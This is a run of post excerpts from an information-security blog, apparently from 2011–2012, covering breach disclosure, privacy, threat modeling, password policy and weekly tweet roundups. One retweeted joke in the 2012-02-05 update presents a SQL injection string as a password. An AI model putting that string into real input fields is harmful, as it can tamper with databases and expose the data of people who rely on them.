
 

Taxpayers Stuck With Tab, but not in Seattle

In an article with absolutely no relevance for Seattle, the New York Times reports “With No Vote, Taxpayers Stuck With Tab on Bonds.” In another story to which Seattle residents should pay no attention, the city of Stockton is voting to declare bankruptcy, after risking taxpayer money on things like a … sports arena. Of […]

 

Will People Ever Pay for Privacy, Part XVI

Every now and then, a headline helps us see the answer to the question “Will people ever pay for Privacy?” Quoth the Paper of record: The seclusion may be the biggest selling point of the estate belonging to Robert Hurst, a former executive at Goldman Sachs, which was just listed by Debbie Loeffler of the […]

 

A flame about flame

CNET ran a truly ridiculous article last week titled “Flame can sabotage computers by deleting files, says Symantec”. And if that’s not goofy enough, the post opens with The virus can not only steal data but disrupt computers by removing critical files, says a Symantec researcher. ZOMG! A virus that deletes files! Now that is […]

 

Breach Notification in France

Over at the Proskauer blog, Cecile Martin writes “Is data breach notification compulsory under French law?” On May 28th, the Commission nationale de l’informatique et des libertés (“CNIL”), the French authority responsible for data privacy, published guidance on breach notification law affecting electronic communications service providers. The guidance was issued with reference to European Directive […]

 

Active Defense: Show me the Money!

Over the last few days, there’s been a lot of folks in my twitter feed talking about “active defense.” Since I can’t compress this into 140 characters, I wanted to comment quickly: show me the money. And if you can’t show me the money, show me the data. First, I’m unsure what’s actually meant by […]

 

Age and Perversity in Computer Security

I’ve observed a phenomenon in computer security: when you want something to be easy, it’s hard, and when you want the same thing to be hard, it’s easy. For example, hard drives fail at seemingly random, and it’s hard to recover data. When you want to destroy the data, it’s surprisingly hard. I call this […]

 

Future of Privacy Seeks Input

The Future of Privacy Forum (FPF) is an interesting mix of folks trying to help shape, well, the future of privacy. They have an interesting mix of academic and industry support, and a fair amount of influence. They’re inviting authors with an interest in privacy issues to submit papers to be considered for FPF’s third […]

 

In the Spirit of Feynman

Did you notice exactly how much of my post on Cloudflare was confirmation bias? Here, let me walk you through it. In our continuing series of disclosure doesn’t hurt, Continuing series are always dangerous, doubly so on blogs. I wanted to point out Cloudflare’s “Post Mortem: Today’s Attack; Apparent Google Apps/Gmail Vulnerability; and How to […]

 

Mozilla's Vegan BBQ

The fine folks at Mozilla have announced that they’ll be hosting a BBQ in Dallas to thank all their supporters. And the cool thing about that BBQ is it’s gonna be vegan by default. You know, vegan. No animal products. It’s good for you. It’s the right default. They’ll have dead cow burgers, but you’ll […]

 

Feynman on Cargo Cult Science

On Twitter, Phil Venables said “More new school thinking from the Feynman archives. Listen to this while thinking of InfoSec.” During the Middle Ages there were all kinds of crazy ideas, such as that a piece of rhinoceros horn would increase potency. Then a method was discovered for separating the ideas–which was to try one […]

 

Edited Twitter Weekly Updates for 2012-06-10

RT @hellNbak_ @adamshostack @derekcslater anything with Scott Blake has to be worth reading. # RT @Beaker Updated BYOD security profile/policy pushed to my iPhone this morning. String passwords on phone unlock (really?) = PiTA. # Bad password policies give no benefit while absorbing your people's willingness to help with security. #Fail (cc @beaker) # RT […]

 

Twitter Weekly Updates for 2012-06-10

RT @DeathStarPR Easy way to feel like Darth Vader: stand over a heap of dirty laundry and imagine you've just killed a Jedi. #StarWars # RT @runasand We have managed to determine exactly how Ethiopia blocks #Tor and we have developed a workaround: https://t.co/snTjeVbN # RT @derekcslater What I learned when I left security http://t.co/AexcK8NN […]

 

CloudFlare's Post Mortem

In our continuing series of disclosure doesn’t hurt, I wanted to point out Cloudflare’s “Post Mortem: Today’s Attack; Apparent Google Apps/Gmail Vulnerability; and How to Protect Yourself.” Go take a look, it’s worth reading, especially the updates. I take three lessons from this: Disclosing an attack allows you to control the story, and is better […]

 

Edited Twitter Weekly Updates for 2012-06-03

Cool Stuff RT @SPACEdotcom SPLASHDOWN! @SpaceX #Dragon Space Capsule Ends Historic Mission with Pacific Ocean Splash http://t.co/3H3J1cXz Cool! IE10 in Win8 Release Preview has "Do Not Track" on by default! http://t.co/HHZv8cBw #privacy # RT @gabrielgironda WE ENCOURAGED PEOPLE TO LEARN TO PROGRAM AND JUST LOOK AT WHAT HAPPENED http://t.co/IE9HeNt3 # New blog: "Washington State Frees […]

 

Washington State Frees Liquor Sales: some quick thoughts

I hate to let an increase in liberty go by without a little celebration. For the past 78 years, Washington State has had a set of (effectively) state-operated liquor stores, with identical pricing and inventory. Today, that system is gone, replaced by private liquor sales. The law was overturned by a ballot initiative, heavily backed […]

 

Twitter Weekly Updates for 2012-05-27

Congratulations to the Egyptian people for claiming the right to vote for their President! # The ACLU of WA is looking for a technology & liberty director http://t.co/sUAFuDq7 # Things that should not surprise me: Koalas smell like eucalyptus. # Powered by Twitter Tools

 

Twitter Weekly Updates for 2012-05-20

RT @votescannell Mother of 3 Arrested for Taking Pictures of Tourist Attraction at Airport http://t.co/Id8TKH9r // I feel safer already. # Freedom gropes for all @seatac! /cc @tsastatus. # RT @ashk4n WiFi Pineapple lets anyone with $90 to "compromise the sh*t out of anyone using WiFi in the area" http://t.co/TnR3n56k #armsrace # Great question for […]

 

My AusCert Gala talk

At AusCert, I had the privilege to share the gala dinner stage with LaserMan and Axis of Awesome, and talk about a few security lessons from Star Wars. I forgot to mention onstage that I’ve actually illustrated all eight of the Saltzer and Schroeder principles, and collected them up as a single page. That […]

 

Twitter Weekly Updates for 2012-05-13

RT @Ellen_CK It appears that putting a contest in one's internal newsletter leads to people actually reading it #SEingmycoworkers # RT @bfist I like my risk like I like my steak << with blue cheese sauce? # RT @451wendy "Q: How many of the Fortune 500 are hacked right now? A: 500." http://t.co/I090fJmp <- Lovely […]

 

Why Sharing Raw Data is Important

Bob Rudis has a nice post up “Off By One : The Importance Of Fact Checking Breach Reports,” in which he points out some apparent errors in the Massachusetts 2011 breach report, and also provides some graphs. Issues like this are why it’s important to release data. It enables independent error checking, but also allows […]

 

What Kip Hawley Doesn't Understand About Terrorism

Former TSA Administrator Kip Hawley was on NPR a few minutes ago, opining on the 2nd panty bomber. He said two remarkable things. First, that the operators of nudatrons, who see thousands of naked people per day, would notice the bomb. Second, he didn’t understand why Al Qaeda would continue to focus on underwear bombs. […]

 

Twitter Weekly Updates for 2012-05-06

RT @netik You program in Rails? Check out Brakeman from our security team & make your code safer. http://t.co/nFPQ3cxx (go @presidentbeef!) # RT @KimZetter Equipment Maker Caught Installing Backdoor Vows to Fix After Public Pressure – http://t.co/EZfe7s27 # Pro tip: "Blackhat talks get lots of publicity" is not a reason *your* submission will make a […]

 

Study: More than 90% of Americans Take Action on Privacy

That’s my takeaway from a new study of 2,000 households by Consumer Reports: There are more than 150 million Americans using Facebook at this point, and that number is growing. … a new exhaustive study from Consumer Reports on social networking privacy found that 13 million American Facebook users have never touched their privacy settings. […]

 

Please Kickstart Elevation of Privilege

Jan-Tilo Kirchhoff asked on Twitter for a printer (ideally in Germany) to print up some Elevation of Privilege card sets. Deb Richardson then suggested Kickstarter. I wanted to comment, but this doesn’t fit in a tweet, so I’ll do it here. I would be totally excited for someone to Kickstarter production of Elevation of Privilege. […]

 

When an interrupt is important

So it’s cool that this “S.M.A.R.T” stuff tells the computer when the hard drive is failing. The next step in user interface is to take the message out of /Applications/Utilities/Disk Utility and into an interruptive UI, so that I don’t discover this problem when I happen to get an extra drive for backup. I know […]

 

Toorcamp: Gender Issues, Cognitive Psychology and Hacking

So the announcement for Toorcamp is out, and it looks like an exciting few days. A few talks already announced look very new school, including “How you can be an ally to us females” by Danielle Hulton and Leigh Honeywell, and “Cognitive Psychology for Hackers.” It’s in the far northwestern corner of the US, and […]

 

How to get my vote for the ACM Board

I’m concerned about issues of research being locked behind paywalls. The core of my reason is that research builds on other research, and wide availability helps science move forward. There’s also an issue that a great deal of science is funded by taxpayers, who are prevented from seeing their work. One of the organizations which […]

 

Twitter Weekly Updates for 2012-04-22

RT @calyxinstitute We've reached over $50,000 in donations and are 44 donors shy of breaking 1,000! Help us keep the momentum going. # RT @deviantollam "It's a sad day in America when you're driving down the road one of these pulls up next to you: http://t.co/1Ksxn5ja " # RT @markrussinovich Debunking of exaggerated cybercrime stats […]

 

Suck My Underground

Hey! Jam Jarr has a new album and it’s free today. They asked for a Facebook link, and since I can’t do that, I figured a blog was in the right spirit. So go check it out: Jam Jarr: Suck My Underground. It’s free. Why not take a listen? PS: When I say free, I […]

 

Dennis Fisher's Novel ("Motherless Children") is out

You probably know Dennis Fisher because of his writings on Threatpost or his Digital Underground podcast, where I’ve appeared several times. I wanted to help him spread the news that his first novel “Motherless Children” is now available. You should check it out. I’ll get my review done shortly, but I wanted to help spread […]

 

Calyx and the Market for Privacy

So there’s a new startup in town, The Calyx Institute, which is raising money to create a privacy-protecting ISP and phone company. I think that’s cool, and have kicked in a little cash, and I wanted to offer up some perspective on the market for privacy, having tried to do this before. From 1999 until […]

 

Twitter Weekly Updates for 2012-04-15

RT @bruces http://t.co/7BfPuW40 *TSA really keen on putting the electronics border-crunch on dissidents << Worse, add http://t.co/3qTkucub # RT @justintroutman @csoghoian If there's one thing that will identify the right privacy expert, it's the urinalysis and one-year probation. # I bet Facebook is going to start auto-sepia toning everyone's pictures as they age. # New […]

 

Fascinating Storyline around Instagram & Facebook

First, congratulations to the folks at Instagram, who built something that was so valuable to Facebook and managed to get a great exit. Me, I suspect that Facebook did it so they can gradually sepia-tone all your photos, but that’s not important right now. I was struck by the nature of this article by the […]

 

Checklists and Information Security

I’ve never been a fan of checklists. Too often, checklists replace thinking and consideration. In the book, Andrew and I wrote: CardSystems had the required security certification, but its security was compromised, so where did things go wrong? Frameworks such as PCI are built around checklists. Checklists compress complex issues into a list of simple […]

 

Edited Twitter Weekly Updates for 2012-04-08

Things I said: Google continues to hobble their services, push accounts/wallet names, now w/ Scholar http://t.co/IIQ7xk15 (cc @rileycrane @tgoetz @skud) # In other words, why not create timelines for every scholar who's published? That would be organizing the worlds info & making it useful. # You need a Google account to get that citation history, […]

 

Chaos Emerges from Demanding Facebook Passwords

On the off chance that you’ve been hiding under a rock, there’s been a stack of news stories about organizations (both private and governmental) demanding people’s Facebook passwords as part of the process of applying for jobs, with much associated hand-wringing. In “I hereby Resign“, Raganwald discusses the downside to employers of demanding to look […]

 

Dear FBI, Who Lost $1Billion?

In a widely discussed op-ed, Richard Clarke wrote: It’s not hard to imagine what happens when an American company pays for research and a Chinese firm gets the results free; it destroys our competitive edge. Shawn Henry, who retired last Friday as the executive assistant director of the F.B.I. (and its lead agent on cybercrime), […]

 

How Harvey Mudd Brings Women into CS

Back in October, I posted on “Maria Klawe on increasing Women in Technology.” Now the New York Times has a story, “Giving Women The Access Code:” “Most of the female students were unwilling to go on in computer science because of the stereotypes they had grown up with,” said Zachary Dodds, a computer scientist at […]

 

Edited Twitter Weekly Updates for 2012-04-01

That’s what I said: Photographers should check out these awesome lens physics simulations from Stanford http://t.co/hlNrqQT3 # Good article by @elinormills "Why data breach isn't a dirty word anymore" http://t.co/JXtTOTbT # New blog with a TED talk, "Doctors Make Mistakes, can we talk about that?" http://t.co/c00zcvMr # .@RSAConference can we go so far as "highly […]

 

How to mess up your breach disclosure

Congratulations to Visa and Mastercard, the latest companies to not notify consumers in a prompt and clear manner, thus inspiring a shrug and a sigh from consumers. No, wait, there isn’t a clear statement, but there is rampant speculation and breathless commentary. It’s always nice to see clear reminders that the way to get people […]

 

Cool Optics Flash Applets

Photographers should check out Flash applets on some technical aspects of photography at Stanford. The apps help you understand things like “Variables that Affect Exposure” (the aperture/time/ISO tradeoffs) as well as how lenses work, create depth of field, or how a telephoto lens bends the light. Very cool.

 

Doctors Make Mistakes. Can we talk about that?

That’s the title of this TED Talk, “Doctors Make Mistakes. Can we talk about that?” When was the last time you heard somebody talk about failure after failure after failure? Oh yeah, you go to a cocktail party and you might hear about some other doctor, but you’re not going to hear somebody talking about […]

 

Edited Twitter Weekly Updates for 2012-03-25

I’m continuing to tweak in the hopes of balancing useful & overwhelming. This week I’m not only cutting down the chaos a bit, but adding the emergent categories. Also, my tweets precede the Re-Tweets. Comments welcome. Where can I send people new to infosec for security mentoring, confident that they'll get broad, data-centered advice? (#newschool) […]

 

BSides Las Vegas 2012 Contest

BSides LV 2012 tickets sold out in under 30 hours last week. I have acquired five tickets to give away. More details later, but the tickets will go to the person or people who have the best story of how they applied the principles of the New School in a real life situation. Start planning […]

 

Does 1Password Store Passwords Securely?

In ““Secure Password Managers” and “Military-Grade Encryption” on Smartphones: Oh, Really?” Andrey Belenko and Dmitry Sklyarov write quite a bit about a lot of password management tools. This is admirable work, and I’m glad BlackHat provided a forum for it. However, as a user of 1Password, I was concerned to read the following about that […]

 

Edited Tweets for 2012-03-18

RT @curphey amazing how many serial entrepreneurs, visionaries & thought leaders in security are wanting to contract @ $75/hour # MT @GammaCounter Chinese spies impersonated US Navy admiral on Facebook, friended NATO officials: http://t.co/FFnpdJ9p via @adam_orbit # I really want @robinsage to RT this: Chinese spies impersonated US Navy admiral on Facebook, friended NATO officials: […]

 

Feelings! Nothing but feelings!

At BSides San Francisco, I met David Sparks, whose blog post on 25 security professionals admit their mistakes I commented on here. And in the department of putting my money where my mouth is, I talked him through the story on camera. The video is here: “Security Guru Tells Tale of How His Blog Became […]

 

Entice, Don't Scold

I really like what Adrian Lane had to say about the cars at RSA: I know several other bloggers have mentioned the exotic cars this year in vendor booths on the conference floor. What’s the connection with security? Nothing. Absolutely nothing. But they sure pulled in the crowds. Cars and booth babes with matching attire. […]

 

Kind of Copyrighted

This Week in Law is a fascinating podcast on technology law issues, although I’m way behind on listening. Recently, I was listening to Episode #124, and they had a discussion of Kind of Bloop, “An 8-Bit Tribute to Miles Davis’ Kind of Blue.” There was a lawsuit against artist Andy Baio, which he discusses in […]

 

Twitter Weekly Updates for 2012-03-11

Photo: "Barcelino Per Donna Welcomes RSA Conference 2012" somehow I perceive a mismatch http://t.co/qlKZIdId # RT @mikko Sony said that they lost Michael Jackson's entire unreleased back catalog in one of the 2011 breaches: http://t.co/KeYM9VyD # I sorta like this print, but I'm not sure I'd pay $12 Trillion for it. http://t.co/dzW8iEEl # RT @normative […]

 

Browser Privacy & Fingerprinting

Ivan Szekely writes in email: A team of young researchers – my colleagues – at the Budapest University of Technology and Economics developed a cross-browser fingerprinting system in order to demonstrate the weaknesses of the most popular browsers. Taking Panopticlick’s idea as a starting point, they developed a new, browser-independent fingerprinting algorithm and started to […]

 

How's that secrecy working out?

Last week at RSA, I was talking to some folks who have reasons to deeply understand a big and publicly discussed breach. I asked them why we didn’t know more about the breach, given that they’d been fairly publicly named and shamed. The story seems to be that after the initial (legal-department-driven) clampdown on talking, […]

 

Stop sinning with complaints about the coffee budget

Someone respected wrote on a private mailing list: “If you spend more on coffee than on IT security, then you will be hacked. What’s more, you deserve to be hacked.” — Richard Clarke, keynote address, RSA 2002 To which, verily I say: Doom! Doom! You commit the sin of false comparison! You have angered Furlongeous, […]

 

Twitter Weekly Updates for 2012-03-04

RT @tedfrank If you're having trouble getting Sudafed, here's how to make it with more readily available crystal meth. http://t.co/THaQZzov # RT @digiphile "Privacy breaches keep getting worse. Facebook admits reading txt msgs of users who installed phone app" http://t.co/v8CMM222 # RT @threatpost #Microsoft partners w/ Good Technology to bring encrypted email to Windows Phone. […]

 

Congratulations!

Our sincere congratulations to all the winners of the Social Security Blogger awards.

 

FEAR AND LOATHING IN SAN FRANCISCO (RSA PRE-GAME)

So it’s early Sunday AM, and I’m getting my RSA Schedule together finally.  So here’s what I’m looking forward to this week, leave us stuff in the comments if you’ve identified other cool stuff: =============== Monday:  8 freaking AM – I’m talking with Rich Mogull of @securosis about Risk Management.  Fun! Monday is also Metricon, […]

 

Twitter Weekly Updates for 2012-02-26

RT @internetlibre Twitter Censors Accounts Unfavorable To Nicolas Sarkozy http://t.co/wMGMuifY #netfreedom #internetlibre #sarkoCensure # RT @Dakami Pretty cool: @joncallas looked at all public keys signed by Entrust; none of them had reused RSA primes http://t.co/8JOsYQ9e # New blog: "It's a Lie: Seattle Taxpayers Will Pay for a Stadium" http://t.co/tkg3JxZi (cc @seattletimes) # Help Find the […]

 

Admitting Mistakes

Tripwire’s blog has “25 Infosec Gurus Admit to their Mistakes…and What They Learned from Them.” I’m glad to see attention paid to the simple reality that we all make mistakes. Extra points to Bill Brenner, Pete Lindstrom, Andrew Hay, Chris Wysopal, Rob Ton and Larry Ponemon for being willing to talk about mistakes that had […]

 

"Anonymized, of course"

I’ve noticed a couple of times lately that as people discuss talking about security incidents, they don’t only default to the idea of anonymization, they often insert an “of course” after it. But today I want to talk about the phrase “anonymized, of course”, what it means, why people might say it, and how members […]

 

Help Find the People Who Killed Ulf Möller

The family of Ulf Möller are asking for help in finding the people who murdered him, and asking for help spreading the word: They have a web site with details in English, German, Polish and Lithuanian: The two men are described as slim, both about 1.75 m to 1.80 m tall, between 20 and 30 […]

 

It's a Lie: Seattle Taxpayers Will Pay for a Stadium

The Seattle Times carries a press release: “Arena plan as solid as it looks?” The intricate plan offered for an NBA and NHL arena in Sodo hinges on the untested strategy of building a city-owned, self-supporting arena, without the aid of new taxes, and with team owners — not taxpayers — obligated to absorb any […]

 

Twitter Weekly Updates for 2012-02-19

RT @csoghoian If Path-like apps that pilfered user contact data suffered a data breach, existing laws wouldn't require disclosure to users. # New quickie blog: Bismark's Voice http://t.co/zk01Biec # RT @paulmadsen Sharingfreude, n. – pleasure derived from inadvertent sharing of personal information on social media by friends & colleagues # .@dakami @jeremiahg @tqbf see also […]

 

New Cyber Security Bill: Crowdsource Analysis?

A lot of people I trust are suggesting that the “Collins-Lieberman” bill has a substantial chance of passing. I have some really interesting (and time-consuming) work tasks right now, and so I’m even more curious than usual what you all think, especially how this According to the press release, the “Collins-Lieberman” bill would: The Department […]

 

Predictably Apathetic responses to Cyber Attack

Wh1t3Rabbit has a great post “Understanding the apathetic response to a cyber attack:” Look, Dana’s right. His business is the organizing and promotion of the UFC fights. Secondary to that business is the merchandising and other aspects of the UFC – but that probably is a significantly smaller portion of the overall company revenue. Now […]

 

Bismark's Voice

Tucked away for decades in a cabinet in Thomas Edison’s laboratory, just behind the cot in which the great inventor napped, a trove of wax cylinder phonograph records has been brought back to life after more than a century of silence. The cylinders, from 1889 and 1890, include the only known recording of the voice […]

 

Twitter Weekly Updates for 2012-02-12

RT @tkeanini Overcoming the fear of disclosure http://t.co/DZdkeyNh << TK is spot on. Our fear blocks feedback loops. # MT @qld_oic ..empowering young people to establish good cyber safety behaviour #oicprivacycomp http://t.co/vkr3VZ3A [$1000 prize for video] # RT @mortman Yet More On Threat Modeling: A Mini-Rant http://t.co/ZPxVa9HE cc @adamshostack @alexhutton #newschool # RT @securityskeptic @mortman […]

 

Book Review: Cloud Security Rules

A while back, Kai Roer graciously sent me an electronic copy of the book Cloud Security Rules that he co-authored with an all-star cast including luminaries Wendy Nather and our very own New School’s Alex Hutton. All in all, it’s a solid read covering the gamut of topics from Risk and Compliance to technology versus […]

 

Have You Seen The Little Piggies?

Apparently, the project manager who found a vendor for the Vermont State Police car decals failed to consider a few things. Such as the risk that prisoners might want to have a little fun at the expense of the police. You can see the fun if you study the image carefully here, or in a […]

 

Why Breach Disclosures are Expensive

Mr. Tripathi went to work assembling a crisis team of lawyers and customers and a chief security officer. They hired a private investigator to scour local pawnshops and Craigslist for the stolen laptop. The biggest headache, he says, was deciphering how much about the breach his nonprofit needed to disclose…Mr. Tripathi said he quickly discovered […]

 

Yet More On Threat Modeling: A Mini-Rant

Yesterday Adam responded to Alex’s question on what people thought about IanG’s claim that threat modeling fails in practice and I wanted to reiterate what I said on twitter about it: It’s a tool! No one claimed it was a silver bullet! Threat modeling is yet another input into an over all risk analysis. And […]

 

On Threat Modeling

Alex recently asked for thoughts on Ian Grigg’s “Why Threat Modeling Fails in Practice.” I’m having trouble responding to Ian, and have come to think that how Ian frames the problem is part of my problem in responding to him. So, as another Adam likes to say, “

 

Twitter Weekly Updates for 2012-02-05

RT @Entropologist Passwords should be a mix of letters, numbers, special characters and longer than 8 characters… like "' or 1=1;–" # RT @ioerror Researchers taking a stand against Elsevier: http://t.co/TMZqj2E9 # RT @ashk4n Even experts are having a hard time differentiating between android malware & mobile ads these days http://t.co/t5qAQANP # Tinker, Tailor is […]

 

Dear Verisign: Trust requires Transparency

On their blog, Verisign made the following statement, which I’ll quote in full: As disclosed in an SEC filing in October 2011, parts of Verisign’s non-production corporate network were penetrated. After a thorough analysis of the attacks, Verisign stated in 2011, and reaffirms, that we do not believe that the operational integrity of the Domain […]

 

Threat Modeling Fails In Practice

Would be interested in readers’ thoughts on Ian G’s post here: https://financialcryptography.com/mt/archives/001357.html

 

Pulling A Stiennon: In The Cloud, The DMZ Is Dead

Calling something in the cloud a DMZ is just weird. Realistically, everything is a DMZ. After all, you are sharing data center space, and if your provider is using virtualization, hardware with all of their other customers. As such, each and every network segment you have is (or should be) isolated and have only a […]

 

Time for an Award for Best Data?

Yesterday, Dan Kaminsky said “There should be a yearly award for Best Security Data, for the best collection and disbursement of hard data and cogent analysis in infosec.” I think it’s a fascinating idea, but think that a yearly award may be premature. However, what I think is sorta irrelevant, absent data. So I’m looking […]

 

More on Real Name Policies

There were a couple of excellent posts about Google+ which I wanted to link in, but the post took a different path: “Google+ and The Trouble With Tribbles” The trouble with social is that it is social – with all the norms, behaviors and expectations that come with that. You cannot re-engineer that overnight (Facebook […]

 

Sharing Research Data

I wanted to share an article from the November issue of the Public Library of Science, both because it’s interesting reading and because of what it tells us about the state of security research. The paper is “Willingness to Share Research Data Is Related to the Strength of the Evidence and the Quality of Reporting […]

 

Yes, Google+ Is a Failure

One of the most common bits of feedback about my post “Google+ Failed Because of Real Names” is that Google+ is now a huge service, and that the word failed is an exaggeration, or a trick of the rhetorician. Some folks might advise me to stop digging a hole, put down the shovel and walk […]

 

A quick pointer

I wrote a blog post regarding the BSidesSF/RSA conf dust-up. (If I knew how to work Adam’s twitter integration thingy, you’d have been spared this)

 

Twitter Weekly Updates for 2012-01-29

Vincent Brown (@politico_ie) should be given an uninterrupted hour with the ECB execs: https://t.co/SZYOtveo # RT @marciahofmann Supreme Court: government installation & use of a GPS device to monitor a vehicle's movements is a 4th Amendment search. # RT @normative RT @thinkprogress: BREAKING: Rand Paul is being detained by TSA in Nashville (via @moirabagley) < […]

 

Aviation Safety

The past 10 years have been the best in the country’s aviation history with 153 fatalities. That’s two deaths for every 100 million passengers on commercial flights, according to an Associated Press analysis of government accident data. The improvement is remarkable. Just a decade earlier, at the time the safest, passengers were 10 times as […]

 

Google+ Failed Because of Real Names

It’s now been a few months since the launch of Google+, and it’s now fairly clear that it’s not a mortal threat to Facebook, or even Orkut. I think it’s worth thinking a bit about why Google+ isn’t doing better, despite its many advantages. Obviously, Google wants to link Google+ profiles to things in the […]

 

Turn Off Javascript

For @weldpond: Please turn off JavaScript. We don’t require it and it only increases your vulnerability.

 

Vendor shout out: Gourmet Depot

You know those random parts of kitchen appliances that break, and the manufacturer is no longer making, and so you buy a new one that breaks after 4 months? Yeah, you know what I’m talking about. Next time, look to Gourmet Depot and see if they have replacement parts. It was easy to find their […]

 

Kudos to Ponemon

In the past, we have had some decidedly critical words for the Ponemon Institute reports, such as “A critique of Ponemon Institute methodology for “churn”” or “Another critique of Ponemon’s method for estimating ‘cost of data breach’“. And to be honest, I’d become sufficiently frustrated that I’d focused my time on other things. So I’d […]

 

Twitter Weekly Updates for 2012-01-22

What's the best history of @Defcon Capture the Flag? (cc @rileycaezar @thedarktangent ) # RT @thedarktangent What's the best history of #DEFCON Capture the Flag? @adamshostack asks, & we need to update the site. Send your links! # RT @jccannon7 My sci fi book launches today. More info at http://t.co/bVd8mUSg # RT @mortman New posts: […]

 

Oracle's 78 Patches This Quarter, Whatever…

There’s been a lot of noise of late because Oracle just released their latest round of patches and there are a total of 78 of them. There’s no doubt that that is a lot of patches. But in and of itself the number of patches is a terrible metric for how secure a product is. […]

 

Seattle in the Snow

(From The Oatmeal.) It’s widely understood that Seattle needs a better way to measure snowfall. However, what’s lacking is a solid proposal for how to measure snowfall around here. And so I have a proposal. We should create a new unit of measurement: The Nickels. Named after Greg Nickels, who lost the mayorship of Seattle […]

 

Ulf Muller

I am saddened to pass on the news that Ulf Müller, a colleague at Zero-Knowledge Systems, has died in tragic and violent circumstances. I remember Ulf as quiet, gentle, kind and am tremendously saddened by his loss. The most recent news story is “Computer-Experte in Transporter erschlagen“. Nils Kammenhuber of the Technical University of Munich […]

 

Please Participate: Survey on Metrics

I got an email from my friend John Johnson who is doing a survey about metrics.  If you have some time, please respond… ———————————————————————————————————————————————— I am seeking feedback from others who may have experience developing and presenting security metrics to various stakeholders at their organization. I have a number of questions I’ve thought of, and […]

 

Continuous Deployment and Security

From an operations and security perspective, continuous deployment is either the best idea since sliced bread or the worst idea since organic spray pancakes in a can. It’s all a matter of execution. Continuous deployment is the logical extension of the Agile development methodology. Adam recently linked to a study that showed that a 25% […]

 

Chocolate Waffles

Too good not to share (inspired by: Chocolate-Hazelnut Waffles with Frangelico-Brown-Butter Syrup) Ingredients : 6 oz. (1-1/3 cups) fresh ground whole-wheat flour 2 oz. (2/3 cup) natural cocoa powder 1-1/2 tsp. baking powder 1/2 tsp. baking soda 1 tsp. kosher salt 3/4 cup granulated palm sugar 2 large eggs, at room temperature 3 oz. (6 […]

 

Twitter Weekly Updates for 2012-01-15

New blog: Shocking News of the Day: Social Security Numbers Suck http://t.co/VuMV3faO # RT @PogoWasRight Does *any* federal govt agency actually respond to FOI requests within 20 days? << Send GAO a FOIA with that question? 🙂 # RT @Digital4rensics On Computer Security Incident Information Sharing: http://t.co/GhGYOOjP – New Post Up! # New worst practice: […]

 

Please vote New School

We’re honored to be nominated in three categories for the Security Bloggers Awards: Most Educational Most Entertaining Hall of Fame On behalf of all of us who blog here, we’re honored by the nomination, and would like to ask for your vote. We’d also like to urge you to vote for our friends at Securosis […]

 

The New School of Software Engineering?

This is a great video about how much of software engineering runs on folk knowledge about how software is built: “Greg Wilson – What We Actually Know About Software Development, and Why We Believe It’s True” There’s a very strong New School tie here. We need to study what’s being done and how well it […]

 

Google+ is not a space for free expression

Earlier today I noticed something funny. My Google profile picture — the picture associated with my Gmail account, my GChat account, my Google+ account, etc — had vanished. A bug? Nope. It turns out, Google — without telling me — went into my account and deleted my profile picture. See “Dear Google+” for the details […]

 

New School Approaches to Passwords

Adam Montville left a comment on my post, “Paper: The Security of Password Expiration“, and I wanted to expand on his question: Passwords suck when they’re not properly cared for. We know this. Any other known form of authentication we have is difficult because of the infrastructure required to pull it off. That sucks too. […]

 

Shocking News of the Day: Social Security Numbers Suck

The firm’s annual Banking Identity Safety Scorecard looked at the consumer-security practices of 25 large banks and credit unions. It found that far too many still rely on customers’ Social Security numbers for authentication purposes — for instance, to verify a customer’s identity when he or she wants to speak to a bank representative over […]

 

Twitter Weekly Updates for 2012-01-08

RT @RegoftheDay Happy new year! 40,000 new laws take effect starting today. http://t.co/EOVyRya9 # RT @StevenLevy Always suspected those xray "backscatter" machines will kill more of us than terrorists will. Now this. http://t.co/ag2lFWWc # New podcast with @dgwbirch: http://t.co/HKeKOVyW # New short blog: "The irony overfloweth" http://t.co/6VsrF9JO # Wow. The Wikipedia article on Infosec certifications […]

 

Paper: The Security of Password Expiration

The security of modern password expiration: an algorithmic framework and empirical analysis, by Yingian Zhang, Fabian Monrose and Michael Reiter. (ACM DOI link) This paper presents the first large-scale study of the success of password expiration in meeting its intended purpose, namely revoking access to an account by an attacker who has captured the account’s […]

 

Steve Bellovin's "Lessons from Suppressing Research"

Steve Bellovin has a good deal of very useful analysis and context about “an experiment that showed that the avian flu strain A(H5N1) could be changed to permit direct ferret-to-ferret spread. While the problem the government is trying to solve is obvious, it’s far from clear that suppression is the right answer, especially in this […]

 

New podcast with Dave Birch

I really enjoyed a conversation with Dave Birch for Consult Hyperion’s “Tomorrow’s Transactions” podcast series. The episode is here. We covered the New School, lessons learned from Zero-Knowledge Systems, and games for security and privacy.

 

The Irony Overfloweth

@RobArnold tweeted: “Someone thinks targeted Facebook ads are an effective way to ask for Firefox features. Any other Mozillians see this?” The irony of using a targeted ad, on Facebook, to ask for more privacy protection…

 

Twitter Weekly Updates for 2012-01-01

RT @timoreilly Amazon patents inferring religion from choice of wrapping paper http://t.co/MmCMx2OO << Over the "creepy" line # RT @kevinmitnick Did you ever want a blue box to make free calls? Now you can in the Apple app store. Search for "blue box". EPIC!!! # I wonder what Woz thinks of being able to get […]

 

Cello Wars

For your holiday amusement: Thanks, Jeff!

 

Twitter Weekly Updates for 2011-12-25

Weekend NewSchool blog: "APT Didn't Eat our Theme. Adam Did." http://t.co/JDvLTayG (cc @RealGeneKim, @alexhutton ) # Really, TSA? The airline isn't allowed to auto-enter my freakin' date of birth? Has anyone calculated lifetimes wasted on red tape? # RT @BillBrenner70 Stop them before they predict again! http://t.co/7qzuTchU # I predict 90% of 2012 infosec predictions […]

 

Discussing Norm Marks' GRC Wishlist for 2012

Norm Marks of the famous Marks On Governance blog has posted his 2012 wishlist.  His blog limits the characters you can leave in a reply, so I thought I’d post mine here. 1.  Norm Wishes for “A globally-accepted organizational governance code, encompassing both risk management and internal control” Norm, if you mean encompassing both so […]

 

Niels Bohr was right about predictions

There’s been much talk of predictions lately, for some reason. Since I don’t sell anything, I almost never make them, but I did offer two predictions early in 2010, during the germination phase of a project a colleague was working on. Since these sort of meet Adam’s criteria by having both numbers and dates, I […]

 

The New School of Security Predictions

Bill Brenner started it with “Stop them before they predict again!:” My inbox has been getting hammered with 2012 vendor security predictions since Halloween. They all pretty much state the obvious: Mobile malware is gonna be a big deal Social networking will continue to be riddled with security holes Technologies A, B and C will […]

 

The Pre-K underground?

Not my headline, but the New York Times: Beyond the effort was the challenge of getting different families to work together. When matters as personal as education, values and children are at stake, intense emotions are sure to follow, whether the issue is snacks (organic or not?), paint (machine washable?) or what religious holidays, if […]

 

Owning Up to Pwnage (Part 2)

